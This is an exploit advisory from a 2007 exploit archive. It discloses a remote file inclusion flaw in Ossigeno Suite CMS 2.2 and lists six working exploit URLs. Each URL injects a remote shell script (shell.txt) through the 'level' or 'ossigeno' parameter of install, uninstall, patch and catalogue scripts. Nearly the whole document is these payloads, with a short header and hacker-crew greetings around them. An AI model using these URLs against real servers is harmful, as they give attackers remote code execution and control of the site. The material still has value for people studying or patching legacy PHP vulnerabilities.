ossigeno22-rfi.txt

2007-11-30T00:00:00
ID PACKETSTORM:61388
Type packetstorm
Reporter ShAy6oOoN
Modified 2007-11-30T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~ Ossigeno Suite CMS 2.2 RFI ~  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---------------------  
Author : ShAy6oOoN  
---------------------  
Group : PitBull Crew  
---------------------  
Script : Ossigeno Suite CMS 2.2  
---------------------  
Download : http://downloads.sourceforge.net/ossigeno/ossigeno-suite-2.2_pre1.tar.gz?modtime=1196337401&big_mirror=0  
---------------------  
Vulnerability Type : Remote File Inclusion  
---------------------  
Method : get  
---------------------  
Register_globals : On  
---------------------  
Exploit URL's :  
---------------------  
  
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/install_module.php?level=http://localhost/shell.txt?  
  
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://localhost/shell.txt?  
  
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/admin/patch/index.php?level=http://localhost/shell.txt?  
  
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/ossigeno/admin/install_module.php?level=http://localhost/shell.txt?  
  
http://localhost/ossigeno-suite-2.2_pre1/upload/xax/ossigeno/admin/uninstall_module.php?level=http://localhost/shell.txt?  
  
http://localhost/ossigeno-suite-2.2_pre1/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://localhost/shell.txt?  
  
  
Greetings:  
----------  
  
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r  
  
  
Thanks To:  
----------  
  
str0ke`